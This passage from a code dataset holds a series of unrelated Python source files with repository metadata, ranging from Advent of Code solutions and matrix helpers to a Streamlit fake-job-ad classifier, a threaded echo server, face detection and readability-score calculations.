= np.concatenate((observations, actions), axis = -1)\n \n return self.sess.run(self.output, feed_dict = {self.input : fullInput})\n \n def train(self, observations, actions, rewards, stateValues, gamma):\n inputs = np.concatenate((observations, actions), axis = -1)\n targets = rewards + gamma*stateValues\n self.global_step = self.global_step + 1\n self.sess.run(self.minimizationOperation, feed_dict = {self.target : targets, self.input : inputs}) ","repo_name":"nspasic96/RL-algorithms","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":16208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1467643762","text":"if __name__ == \"__main__\":\n with open(\"./inputs/day3.txt\") as f :\n data= f.read().splitlines()\n n=len(data[0])\n rights = [1,3,5,7,1]\n downs = [1,1,1,1,2]\n # print(n,data[:3])\n pos=0\n tree = \"#\"\n n_tree = 0\n\n for line in data[::downs[1]]:\n if line[pos]==tree:\n n_tree+=1\n pos=(pos+rights[1])%n\n print(n_tree)\n\n n_trees=1\n for right,down in zip(rights,downs):\n n_tree = 0\n pos=0\n for line in data[::down]:\n if line[pos]==tree:\n n_tree+=1\n pos=(pos+right)%n\n n_trees*=n_tree\n print(n_trees)\n","repo_name":"Kornflex28/adventofcode2020","sub_path":"code/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7630075993","text":"# How to run Pygame fullscreen on a Chromebook\n# Width and height need to match screen resolution to prevent an error\n\nimport pygame\n\npygame.display.init()\n\nwidth, height = pygame.display.Info().current_w, pygame.display.Info().current_h\nwindow_surface = pygame.display.set_mode((width, height), pygame.FULLSCREEN)\n\nrunning = True\nclock = pygame.time.Clock()\n\n\nwhile running:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n running = False\n\n pygame.display.update()","repo_name":"PBKoning/Python_test_projects","sub_path":"PygameFullScreenOnChromebook/fullscreen_chromebook.py","file_name":"fullscreen_chromebook.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37260393814","text":"import time\n\nDEBUG = 0\n\nif DEBUG:\n\tFILE = 'day12_debug.txt'\nelse:\n\tFILE = 'day12.txt'\n\n\ndef load():\n\twith open(FILE) as file:\n\t\tarr = file.read().rstrip().split('\\n')\n\treturn arr\n\n\ndef parse(data):\n\tgrid = {}\n\tgrid['width'] = len(data[0])\n\tgrid['height'] = len(data)\n\tgrid['possible_start'] = set()\n\tfor row in range(grid['height']):\n\t\tfor col in range(grid['width']):\n\t\t\tgrid[(row, col)] = data[row][col]\n\t\t\tif grid[(row, col)] == 'S':\n\t\t\t\tgrid['start'] = row, col\n\t\t\t\tgrid[(row, col)] = 'a'\n\t\t\telif grid[row, col] == 'E':\n\t\t\t\tgrid[(row, col)] = 'z'\n\t\t\t\tgrid['finish'] = row, col\n\n\t\t\tif grid[(row, col)] == 'a':\n\t\t\t\tgrid['possible_start'].add((row, col))\n\treturn grid\n\n\ndef part_one(grid, max_steps=None):\n\tstart = grid['start']\n\tfinish = grid['finish']\n\n\tvisited = set()\n\tqueue = set()\n\ttemp_queue = set()\n\tqueue.add(start)\n\tvisited.add(start)\n\t# as long as we have locations in the queue, keep going\n\t# if we hit the finish line during the loop, we will break out\n\tsteps = 1\n\twhile queue:\n\t\t# get a location from 
the queue\n\t\trow, col = queue.pop()\n\n\t\tcurrent = grid[(row, col)]\n\t\tcurrent_height = ord(current)\n\n\t\t# find all neighbors we can move to\n\t\tpossible_moves = set()\n\t\tleft = (row, col-1) if col > 0 else None\n\t\tright = (row, col+1) if col < grid['width'] - 1 else None\n\t\tup = (row-1, col) if row > 0 else None\n\t\tdown = (row+1, col) if row < grid['height'] - 1 else None\n\n\t\tif left and ord(grid[left]) <= current_height + 1:\n\t\t\tpossible_moves.add(left)\n\t\tif right and ord(grid[right]) <= current_height + 1:\n\t\t\tpossible_moves.add(right)\n\t\tif up and ord(grid[up]) <= current_height + 1:\n\t\t\tpossible_moves.add(up)\n\t\tif down and ord(grid[down]) <= current_height + 1:\n\t\t\tpossible_moves.add(down)\n\n\t\t# check all of those whether we already were there (if so, we already have a path to them that was shorter\n\t\tpossible_moves = possible_moves - visited\n\n\t\t# after doing so, check whether that location is the finish line\n\t\tif finish in possible_moves:\n\t\t\treturn steps\n\n\t\t# mark all the moves as visited\n\t\tvisited = visited | possible_moves\n\n\t\t# add all possible moves to a temporary queue we will use for our next step\n\t\ttemp_queue = temp_queue | possible_moves\n\n\t\t# if main queue is empty, we have exhausted all options for our current step\n\t\t# now we add the current temporary queue to the main queue, and empty the temporary queue, so that we can move\n\t\t# to check our next steps\n\t\t# increase step counter while doing that\n\t\tif len(queue) == 0:\n\t\t\tqueue = temp_queue\n\t\t\ttemp_queue = set()\n\t\t\tsteps += 1\n\t\t\tif max_steps is not None and steps > max_steps:\n\t\t\t\treturn None\n\treturn None\n\n\n\ndef part_two(grid):\n\tstart_options = grid['possible_start']\n\tbest_length = None\n\tfor start in start_options:\n\t\tgrid['start'] = start\n\t\tpath_length = part_one(grid, best_length)\n\t\tif best_length is None:\n\t\t\tbest_length = path_length\n\t\telif path_length is not None and path_length < best_length:\n\t\t\tbest_length = path_length\n\treturn best_length\n\n\n\n\nif __name__ == '__main__':\n\tdata = load()\n\tdata = parse(data)\n\tprint(data)\n\n\tstart_time = time.time()\n\tprint('Part One:', part_one(data))\n\tprint(f'--- {time.time() - start_time} seconds ---')\n\t\n\tstart_time = time.time()\n\tprint('Part Two:', part_two(data))\n\tprint(f'--- {time.time() - start_time} seconds ---')\n","repo_name":"Mottschi/Advent_Of_Code_2022","sub_path":"day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7245126335","text":"#!/usr/bin/python3\n'''\nConsume API with Python to export to csv\n'''\nimport json\nimport requests\nif __name__ == \"__main__\":\n export = {}\n url = 'https://jsonplaceholder.typicode.com/users/'\n employees = requests.get(url)\n for i in employees.json():\n employeeID = i['id']\n route = 'https://jsonplaceholder.typicode.com/users/{}/todos'\n url = route.format(employeeID)\n todoByEmployee = requests.get(url)\n\n username = i['username']\n rows = []\n data = {}\n\n for j in todoByEmployee.json():\n data = {}\n data['task'] = j['title']\n data['completed'] = j['completed']\n data['username'] = username\n rows.append(data)\n\n export[employeeID] = rows\n file = '{}.json'.format('todo_all_employees')\n\n with open(file, 'w') as f:\n json.dump(export, 
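\n        # export maps each employee id to a list of {task, completed, username} rows;\n        # json.dump also accepts an indent argument (e.g. indent=4) for a pretty-printed file\n        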
f)\n","repo_name":"rayd1893/holberton-system_engineering-devops","sub_path":"0x15-api/3-dictionary_of_list_of_dictionaries.py","file_name":"3-dictionary_of_list_of_dictionaries.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31923683876","text":"# The MatrixOperations class includes a group of methods that allow the matrix to be used for row reduction operations\n# prints out all values stored in the matrix to the console\nimport MatrixExceptions\nfrom MatrixExceptions import RowSizeException\n\n\n# Prints out each value stored in the mateix\ndef printout(a):\n row_string = \"\"\n for row in range(a.get_height()):\n for column in range(a.get_width()):\n row_string += str(a.get_value(row, column)) + \" \"\n print(row_string)\n row_string = \"\"\n\n\n# replaces a row in the matrix with the passed new row\ndef replace_row(A, row_number, new_row):\n matrix_width = A.get_width()\n row_size = len(new_row)\n if row_size > matrix_width:\n raise RowSizeException(\n \"Tried to place a row with {0} elements into a Matrix with only {1} Columns\"\n .format(row_size, matrix_width))\n return\n\n print(\"Setting row {0} to {1}\".format(row_number, new_row))\n A.set_row(row_number, new_row)\n\n\n\"\"\"replaces a column in the matrix with the passed new column\n#Column_number represents the index of the column in the matrix that will be replaced.\n#column_index represents the current index in the new column (the value that is being placed into the matrix)\n# the passed column must have the same number of entries as the number of rows in the matrix\n\"\"\"\n\n\ndef replace_column(A, column_number, new_column):\n new_column_index = 0\n for row in A.get_data():\n row[column_number] = new_column[new_column_index]\n new_column_index += 1\n return\n\n\n# adds a new column on the rightmost side of the matrix\ndef add_column(A, new_column):\n A.set_width(A.get_width() + 1)\n for row in range(A.get_height()):\n A.get_row(row).append(new_column[row])\n\n return\n\n\n# adds a new row to the bottom of the matrix\ndef add_row(A, new_row):\n old_height = A.get_height()\n A.set_height(old_height + 1)\n A.get_data().append(new_row)\n A.set_height(old_height + 1)\n\n\n# changes the stored matrix into a row reduced echelon form\ndef rref(A):\n print(1)\n # does the thing\n ## Step 1: regular echelon form\n # all numbers below pivot are zero\n # all pivots to the right of above pivots\n # all nonzero rows are above all rows of zeros\n # ECHELON LOOP\n # Find the first nonzero column. (column_is_all_zero())\n # pick a number to be the pivot in that column\n # interchange rows to put that number in the first row\n # create all zeros below the pivot\n # That column is done for now. \"Ignore\" that column and the row its in for now.\n # If there are more columns to echelonize, repeat loop.\n\n ##now RREF LOOP\n # now starting with the rightmost pivot, zero the positions above all pivots\n\n # when all columns have zeros above and below pivots, its done! 
the matrix is in RREF\n\n\n# looks through each row,\n# if it contains all zeroes, interchange it with the lowest nonzero row\ndef put_all_zero_rows_on_bottom(A):\n number_of_zero_rows = 0\n height = A.get_height()\n for row_index in range(height):\n # Only runs if the row index hasn't reached the known rows of all zeros\n if row_index < height - number_of_zero_rows:\n # check if its zero\n if row_is_all_zero(A.get_row(row_index)):\n # if its zero, switch it\n print(\"Row {0} is all zeros\".format(row_index))\n row_interchange(A, height - 1 - number_of_zero_rows, row_index)\n number_of_zero_rows += 1\n # Only re-checks if the row index hasn't reached the known rows of all zeros\n if row_index < height - number_of_zero_rows:\n if row_is_all_zero(A.get_row(row_index)):\n print(\"ITS ALL ZERO AGAIN\")\n # then check to make sure the new one isn't zero as well\n row_interchange(A, height - 1 - number_of_zero_rows, row_index)\n number_of_zero_rows += 1\n\n\n# PAss in a row number! (integer index of the row you are checking to see if its zero)\n# returns true if the passed list contains only 0 elements\ndef row_is_all_zero(row):\n for value in row:\n if value != 0:\n return False\n\n return True\n\n\n# Pass in a \"column\" in the form of a list of integers.\n# Returns true only if every integer in the list is zero\ndef column_is_all_zero(column):\n for number in column:\n if number != 0:\n return False\n\n return True\n\n\n# pass in two row numbers (INTEGERS) those two rows of te matrix will be interchanged with each other\ndef row_interchange(A, row1_index, row2_index):\n print(\"Interchanging rows with index {0}, {1} \".format(row1_index, row2_index))\n temp = A.get_row(row1_index)\n A.set_row(row1_index, A.get_row(row2_index))\n A.set_row(row2_index, temp)\n\n\n# matrix row add operation to add a row into another row\ndef row_add(A, row_index1, row_index2):\n row1 = A.get_row(row_index1)\n row2 = A.get_row(row_index2)\n\n if len(row1) != len(row2): # this should never happen\n print(\"Error! 
Attempting to add rows of different lengths\")\n return A\n\n for x in range(len(row1)): # both rows have the same legth\n row1[x] += row2[x]\n\n A.set_row(row_index1, row1)\n\n\n# matrix row scale operation, scales the row at A[row_index] by scale factor\ndef row_scale(A, row_index, scale_factor):\n row = A.get_row(row_index)\n for x in range(len(row)):\n row[x] *= scale_factor\n A.set_row(row_index, row)\n\n\n# Scales row 2 and adds it to row 1, but then scales row2 back so that it is unchanged\n# row_index1 and row_index 2 are expected to be integer values < the number of rows in A\ndef row_scaled_add(A, row_index1, row_index2, scale_factor):\n row_scale(A, row_index2, scale_factor)\n row_add(A, row_index1, row_index2)\n inverse_scale_factor = 1 / scale_factor\n row_scale(A, row_index2, inverse_scale_factor)\n","repo_name":"NicholasDowell/Matrix-Calculator","sub_path":"MatrixOperations.py","file_name":"MatrixOperations.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1851159753","text":"from django.conf.urls.defaults import *\n\nimport views\n\nurlpatterns = patterns('',\n (r'^$', views.index),\n (r'^stats/$', views.stats),\n (r'^stats_table/$', views.stats_table),\n (r'^put/$', views.put),\n (r'^ready/(?P<tube>[\\w-]*)$', views.ready),\n (r'^delayed/(?P<tube>[\\w-]*)$', views.delayed),\n (r'^buried/(?P<tube>[\\w-]*)$', views.buried),\n (r'^inspect/(?P<id>\\d*)$', views.inspect),\n (r'^tube/(?P<tube>[\\w-]+)/stats/$', views.tube_stats),\n (r'^job/(?P<id>\\d+)/delete/$', views.job_delete),\n (r'^job/(?P<id>\\d+)/kick/$', views.job_kick),\n)\n","repo_name":"andreisavu/django-jack","sub_path":"jack/beanstalk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"53"} +{"seq_id":"27199465532","text":"from item.util import convert_units\n\n#: iTEM data flow matching the data from this source.\nDATAFLOW = \"EMISSIONS\"\n\n#: Dimensions and attributes which do not vary across this data set.\nCOMMON_DIMS = dict(\n source=\"JRC\",\n variable=\"Emissions\",\n pollutant=\"CO2\",\n lca_scope=\"TTW\",\n service=\"_T\",\n vehicle=\"_T\",\n fuel=\"_T\",\n technology=\"_T\",\n)\n\n#: Columns to drop from the raw data.\nCOLUMNS = dict(\n drop=[\"IPCC_description\", \"IPCC-Annex\", \"Name\", \"World Region\"],\n)\n\n#: Map from IPCC emissions category codes to iTEM ``CL_MODE`` values. The actual\n#: descriptions appear in the ``IPCC_description`` column, which is discarded.\n#:\n#: - 1.A.3.a: Civil Aviation\n#: - 1.A.3.b: Road Transportation\n#: - 1.A.3.c: Railways\n#: - 1.A.3.d: Water-borne Navigation\n#: - 1.A.3.e: Other Transportation\nMAP_MODE = {\n \"1.A.3.a\": \"Air\",\n \"1.A.3.b\": \"Road\",\n \"1.A.3.c\": \"Rail\",\n \"1.A.3.d\": \"Water\",\n \"1.A.3.e\": \"Other\",\n}\n\n\ndef process(df):\n \"\"\"Process T005.\n\n 1. Select only measures with IDs beginning \"1.A.3\".\n 2. Map from the IPCC emissions category (e.g. \"1.A.3.a\") to mode (e.g. \"Air\"); see\n :func:`map_mode`.\n 3. Melt from wide to long format.\n 4. Drop NA values.\n 5. Use “_X” (not allocated/unspecified) as the region for international shipping and\n aviation.\n 6. 
Convert from Mt/a to Gt/a.\n \"\"\"\n return (\n df[df[\"IPCC\"].str.startswith(\"1.A.3\")]\n .assign(MODE=lambda df_: df_[\"IPCC\"].apply(MAP_MODE.get))\n .drop(columns=[\"IPCC\"])\n .melt(id_vars=[\"ISO_A3\", \"MODE\"], var_name=\"TIME_PERIOD\", value_name=\"VALUE\")\n .dropna(subset=[\"VALUE\"])\n .rename(columns={\"ISO_A3\": \"REF_AREA\"})\n .replace({\"REF_AREA\": {\"SEA\": \"_X\", \"AIR\": \"_X\"}})\n .pipe(convert_units, \"megatonne / year\", \"gigatonne / year\")\n )\n","repo_name":"transportenergy/database","sub_path":"item/historical/T005.py","file_name":"T005.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"39272078035","text":"# O(n) time | O(1) space\ndef minNumberOfJumps(array):\n # Write your code here.\n if len(array) == 1:\n return 0\n jumps = 0\n maxReach = array[0]\n steps = array[0]\n for i in range(1, len(array) - 1):\n maxReach = max(maxReach, i + array[i])\n steps -= 1\n if steps == 0:\n jumps += 1\n steps = maxReach - i\n return jumps + 1\n\n\n\n# Solution 2\n# O(n^2) time | O(n) space\n# def minNumberOfJumps(array):\n# # Write your code here.\n# jumps = [float(\"inf\") for x in array]\n# jumps[0] = 0\n# for i in range(1, len(array)):\n# for j in range(0, i):\n# if array[j] >= i - j:\n# jumps[i] = min(jumps[j] + 1, jumps[i])\n# return jumps[-1]\n\n\n\n# Solution 3\n# def minNumberOfJumps(array):\n# # Write your code here.\n# jump = 1\n# a, b = array[0], array[0]\n# if len(array) == 0 or len(array) == 1:\n# return 0\n\n# for i in range(1, len(array)):\n# if i == len(array) - 1:\n# return jump\n\n# a -= 1\n# b -= 1\n# if array[i] > b:\n# b = array[i]\n\n# if a == 0:\n# a = b\n# jump += 1\n# return jump\n","repo_name":"Wanderer-Keerthi/algo-expert","sub_path":"min_number_of_jumps.py","file_name":"min_number_of_jumps.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73232949929","text":"import socket\n\nfrom _thread import start_new_thread\nimport threading\n\nlock = threading.Lock()\n\ndef threaded(con):\n while True:\n data = con.recv(1024)\n\n if not data:\n print(\"Bye\")\n lock.release()\n break\n\n data = data[::-1]\n\n con.send(data)\n\n con.close()\n\ndef main():\n host = \"\"\n port = 8080\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # bind to port = 8080\n s.bind((host,port))\n\n # listen\n s.listen(5)\n\n while True:\n\n con, adr = s.accept()\n\n # acquire lock\n lock.acquire()\n print(adr[0], adr[1])\n\n start_new_thread(threaded, (con,))\n\n s.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"userarpit/Python","sub_path":"socket/serverthread.py","file_name":"serverthread.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41735351324","text":"import streamlit as st\nimport requests\nimport json\nimport pandas as pd\nfrom PIL import Image\nimport nltk\nimport re\nimport pickle\nimport string\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer\nfrom tensorflow.keras.preprocessing.text import one_hot, Tokenizer\nfrom tensorflow.keras.layers import Embedding\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\nst.set_page_config(\n page_title=\"Job Fake Prediction\",\n page_icon=\"💼\",\n initial_sidebar_state=\"collapsed\",\n layout = \"wide\",\n menu_items={\n 'Get Help': 
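\n        # menu_items recognizes the keys 'Get Help', 'Report a bug' and 'About'\n        # ('About' may also be given markdown text, as below)\n        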
'https://www.google.com/',\n 'Report a bug': \"https://github.com/marwanmusa\",\n 'About': \"# Milestone 2 - Job Fake Prediction Application\"\n }\n)\n\ncol1, col2, col3 = st.columns([2,4,2])\nwith col2:\n image = Image.open('logo.png')\n st.image(image, use_column_width=True)\n\nst.markdown(\"\")\nst.markdown(\"\")\nst.markdown(\"\")\n# image input input #\nst.markdown(\"<h2 style='text-align: center; color: black;'>Input the Job Ads Description 💼</h2>\", unsafe_allow_html=True)\nwith st.container():\n description1 = st.text_area(\"\", placeholder=\"Paste here...\")\n\nsubmitted_text = st.button('submit')\n\nif submitted_text:\n st.markdown(\"\")\n st.markdown(\"\")\n st.markdown(\"\") \n with st.container():\n st.markdown(f\"### ***Your input is :*** \\n {description1}\")\n \n fraudulent = 1 # default value // not impacting the model result\n isidata = [description1, fraudulent] \n columns = ['description', 'fraudulent']\n\n data_ = pd.DataFrame(data = [isidata], columns = columns) \n\n # Menghilangkan kata-kata yang ada dalam list stopwords-english\n nltk.download('stopwords')\n\n # Fungsi untuk clean data\n def clean_text(text):\n '''Make text lowercase, remove text in square brackets,remove links,remove punctuation\n and remove words containing numbers.'''\n text = str(text).lower() # Membuat text menjadi lower case\n text = re.sub('\\[.*?\\]', '', text) # Menghilangkan text dalam square brackets\n text = re.sub('https?://\\S+|www\\.\\S+', '', text) # menghilangkan links\n text = re.sub('<.*?>+', '', text) # Menghilangkan text dalam <>\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text) # menghilangkan punctuatuion \n text = re.sub('\\n', '', text) # Menghilangkan enter / new line\n text = re.sub('\\w*\\d\\w*', '', text) # Menghilangkan karakter yang terdiri dari huruf dan angka\n return text\n\n # cleaning data\n infdat = data_.drop('fraudulent', axis = 1)\n infdat['description'] = infdat['description'].apply(lambda x:clean_text(x))\n\n # Defining corpus with cleaned data\n ss = SnowballStemmer(language='english') \n corpusinf = []\n for i in range(0, len(infdat)):\n decsr = infdat['description'][i]\n decsr = decsr.split() # splitting data\n decsr = [ss.stem(word) for word in decsr if not word in stopwords.words('english')] # steeming setiap huruf dengan pengecualian kata yang ada dalam stopwords\n decsr = ' '.join(decsr)\n corpusinf.append(decsr)\n\n infdat['corpusinf'] = corpusinf\n infdat.reset_index(inplace = True)\n\n # encoding\n voc_size = 5000\n inf_enc_corps = [one_hot(words, voc_size) for words in corpusinf]\n\n # loading\n with open('tokenizer.pickle', 'rb') as handle:\n tokenizer = pickle.load(handle)\n\n # Tokenization\n descr_length = 40\n inf_word_idx = tokenizer.texts_to_sequences(infdat['corpusinf'])\n inf_padded_seqs = pad_sequences(inf_word_idx, maxlen = descr_length)\n\n input_data_json = json.dumps({\n \"signature_name\": \"serving_default\",\n \"instances\": inf_padded_seqs.tolist(),\n })\n\n URL = \"http://fakejobprediction-app.herokuapp.com/v1/models/fake_job_prediction:predict\"\n\n response = requests.post(URL, data=input_data_json)\n response.raise_for_status() # raise an exception in case of error\n response = response.json()\n\n # st.markdown(\"<h2 style='text-align: center; color: black;'>Customer's Data Recap</h2>\", unsafe_allow_html=True)\n st.markdown(\"\")\n st.markdown(\"\")\n st.markdown(\"\")\n st.markdown(\"### *& The Prediction is :*\") \n for res in response['predictions'][0]:\n if res > 0.5:\n st.markdown(\"<h2 
style='text-align: center; color: red;'>Fake Job Ads</h2>\", unsafe_allow_html=True)\n else:\n st.markdown(\"<h2 style='text-align: center; color: green;'>Real Job Ads</h2>\", unsafe_allow_html=True)\n\n","repo_name":"marwanmusa/NLP-FakeJobPost-Prediction","sub_path":"frontend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33912355148","text":"import loader\nimport torch\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom facenet_pytorch import MTCNN, InceptionResnetV1\nfrom torch.utils.data import DataLoader\nfrom PIL import Image, ImageDraw\nfrom torchvision import datasets\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nprint('Running on device: {}'.format(device))\n\nmtcnn = MTCNN(\n image_size=160, margin=0, min_face_size=20,\n thresholds=[0.6, 0.7, 0.7], factor=0.709, post_process=True,\n device=device\n)\n\nfilename = '0a4f0c8985297ed7.mp4'\n# filename = '0a8e8e7b229fe1fc.mp4'\nfilepath = f'datasets/train/videos/{filename}'\n\nvideo = loader.load_video(filepath, every_n_frames=20, scale=0.5)\nprint(f'length = {len(video.out_video)}')\nimage = video.out_video[10]\n\nbboxes, confs = mtcnn.detect(video.out_video[10:20])\nprint(f'BBOX = {bboxes}')\nbox = bboxes[0][0]\n\npil_img = Image.fromarray(image)\nimg_draw = ImageDraw.Draw(pil_img)\nleft, top, right, bottom = box\nprint(f'BOX = {box}')\nshape = [(left, top), (right, bottom)]\nimg_draw.rectangle(shape, outline='#AAFF00', width=10)\npil_img.show()\n\nprint(f'bbox = {bbox}')\n\n\n","repo_name":"milselarch/AISG","sub_path":"neural_detect.py","file_name":"neural_detect.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3949063845","text":"# Yoon Hyup Hwang, Zhou Tan\nimport functools\nimport math\nimport operator\n\ndef main():\n print(\"This project is collaboratively finished by Yoon Hyup Hwang and Zhou Tan\")\n fileName = input(\"Type in your file name('q' to quit the program): \")\n while fileName != 'q':\n text = readFile(fileName)\n sentences = getSentences(text)\n sentenceCount = getSentenceCount(sentences)\n dictionary = {}\n wordCount = getWordCount(sentences, dictionary)\n longWordCount = getLongWordCount(sentences)\n polysyllabicWordCount = getPolysyllableWordCount(sentences)\n letterCount = getLetterCount(sentences)\n syllableCount = getSyllableCount(sentences)\n KincaidMeasure = getKincaidMeasure(sentenceCount, wordCount, \n syllableCount)\n print(\"1. KincaidMeasure: \", KincaidMeasure)\n ARImeasure = getARImeasure(sentenceCount, wordCount, letterCount)\n print(\"2. ARImeasure: \", ARImeasure)\n ColemanLiauMeasure = getColemanLiauMeasure(sentenceCount, wordCount, \n letterCount)\n print(\"3. ColemanLiauMeasure: \", ColemanLiauMeasure)\n FleschMeasure = getFleschMeasure(sentenceCount, wordCount, syllableCount)\n print(\"4. FleschMeasure: \", FleschMeasure)\n GunningFogMeasure = getGunningFogMeasure(sentenceCount, wordCount, \n polysyllabicWordCount)\n print(\"5. GunningFogMeasure: \", GunningFogMeasure)\n LixMeasure = getLixMeasure(sentenceCount, wordCount, longWordCount)\n print(\"6. LixMeasure: \", LixMeasure)\n SmogMeasure = getSmogMeasure(wordCount, polysyllabicWordCount)\n print(\"7. SmogMeasure: \", SmogMeasure)\n Richness = getRichness(dictionary)\n print(\"8. 
Richness: \", Richness)\n wordStats = [(key, dictionary[key]) for key in dictionary.keys()]\n sortedwordStats = sorted(wordStats, key = operator.itemgetter(1),\n reverse = True)\n print('Top 10 Frequent words:')\n for i in range(10):\n print(sortedwordStats[i][0], sortedwordStats[i][1], sep = ': ')\n fileName = input(\"Type in your file name('q' to quit the program): \")\n print(\"Goodbye!\")\n return None\n\ndef readFile(fileName):\n '''Read the input text file.'''\n lineLists = []\n with open(fileName) as file:\n for line in file:\n lineLists.append(line)\n return lineLists\n\ndef getSentences(text):\n '''Reorganize and clean sentences from the raw input.'''\n filteredList = []\n filteredLine = ''\n previousChar = ''\n if(text[-1][-1] not in '.!?'):\n text[-1] += '.'\n for line in text:\n #check if the previous line doesn't end a sentence and starts with no spacs in between words\n if previousChar != ' ' and line[0] not in '.!? ':\n filteredLine += ' '\n for char in line:\n if char not in '.!?':\n filteredChar = char.lower()\n if not (char.isalpha() or char == '\\''):\n if previousChar == ' ':\n continue\n else:\n filteredChar = ' '\n filteredLine += filteredChar\n previousChar = filteredChar\n elif len(filteredLine.strip()) != 0:\n filteredList.append(filteredLine.strip())\n filteredLine = ''\n return filteredList\n \ndef getSentenceCount(sentences):\n '''Get the total sentence count.'''\n return len(sentences)\n\ndef getWordCount(sentences, dictionary):\n '''Get the total word count.'''\n wordLists = []\n wordCount = 0\n for sentence in sentences:\n #words have been filtered already, just split them up\n wordLists = sentence.split()\n wordCount += len(wordLists)\n for word in wordLists:\n if(word in dictionary.keys()):\n dictionary[word] += 1\n else:\n dictionary[word] = 1\n return wordCount\n\ndef getLongWordCount(sentences):\n '''Get the Long word(words with 6 or more litters) count.'''\n wordLists = []\n longWordCount = 0\n for sentence in sentences:\n wordLists = sentence.split()\n for word in wordLists:\n if(len(word) >= 6):\n longWordCount += 1\n return longWordCount\n\ndef getPolysyllableWordCount(sentences):\n '''Get the total word count with ploy(three or more) syllable.'''\n worldLists = []\n polyCount = 0\n for sentence in sentences:\n wordLists = sentence.split()\n for word in wordLists:\n count = checkSyllable(word)\n if count >= 3:\n polyCount += 1\n return polyCount\n\ndef getLetterCount(sentences):\n '''Get the total letter count.'''\n letter = ''\n for sentence in sentences:\n letter += ''.join(list(filter(lambda x: x.isalpha() , sentence)))\n return len(letter)\n\ndef getSyllableCount(sentences):\n '''Get the total syllable count.'''\n worldLists = []\n syllableCount = 0\n for sentence in sentences:\n wordLists = sentence.split()\n for word in wordLists:\n syllableCount += checkSyllable(word) #strip out apostrophes\n return syllableCount\n\ndef checkSyllable(word):\n '''Check how many syllables are there for the given word.'''\n firstSyllable = ''\n syllableCount = 0\n if len(word) <= 3:\n return 1\n for i in range(0, len(word)):\n #find a vowel\n if(word[i] in 'aeiouy'): \n if (firstSyllable == ''):\n firstSyllable = word[i]\n #consonant followed by a vowel, count it\n elif firstSyllable != '':\n syllableCount += 1\n firstSyllable = ''\n #last vowel also counts\n if word[-1] in 'aeiouy':\n syllableCount += 1\n if (syllableCount == 0):\n return 1\n if ((word[-2:] in ['es', 'ed'] and word[-3] not in \"aeiouy\") \n or (word.endswith('e') and not word.endswith('le') and 
word[-2] not in 'aeiouy')):\n syllableCount -= 1\n if (word.startswith('y') and word[1] not in 'aeiouy'):\n syllableCount -= 1\n if syllableCount == 0:\n return 1\n return syllableCount\n\ndef getKincaidMeasure(sentenceCount, wordCount, syllableCount):\n '''Return the Kincaid (Flesch-Kincaid grade level) measure.'''\n return ((11.8 * syllableCount / wordCount) + (0.39 * wordCount / sentenceCount) - 15.59)\n\ndef getARImeasure(sentenceCount, wordCount, letterCount):\n '''Return the Automated Readability Index measure.'''\n return ((4.71 * letterCount / wordCount) + (0.5 * wordCount / sentenceCount) - 21.43)\n\ndef getColemanLiauMeasure(sentenceCount, wordCount, letterCount):\n '''Return the Coleman-Liau measure.'''\n return ((5.89 * letterCount / wordCount) - ((0.3 * sentenceCount) / (100 * wordCount)) - 15.8)\n\ndef getFleschMeasure(sentenceCount, wordCount, syllableCount):\n '''Return the Flesch reading-ease measure.'''\n return (206.835 - (84.6 * syllableCount / wordCount) - (1.015 * wordCount / sentenceCount))\n\ndef getGunningFogMeasure(sentenceCount, wordCount, polysyllabicWordCount):\n '''Return the Gunning Fog measure.'''\n return (0.4 * (wordCount / sentenceCount + \n 100 * polysyllabicWordCount / wordCount))\n\ndef getLixMeasure(sentenceCount, wordCount, longWordCount):\n '''Return the Lix measure.'''\n return (wordCount / sentenceCount + 100 * longWordCount / wordCount)\n\ndef getSmogMeasure(wordCount, polysyllabicWordCount):\n '''Return the SMOG measure.'''\n return (3 + math.sqrt(30 * polysyllabicWordCount / wordCount))\n\ndef getRichness(dictionary):\n '''Get how 'rich' the vocabulary is for the given dictionary.'''\n wordStats = [(key, dictionary[key]) for key in dictionary.keys()]\n sortedwordStats = sorted(wordStats, key = operator.itemgetter(1),\n reverse = True)\n totalWordCount = 0\n wordCount = 0\n 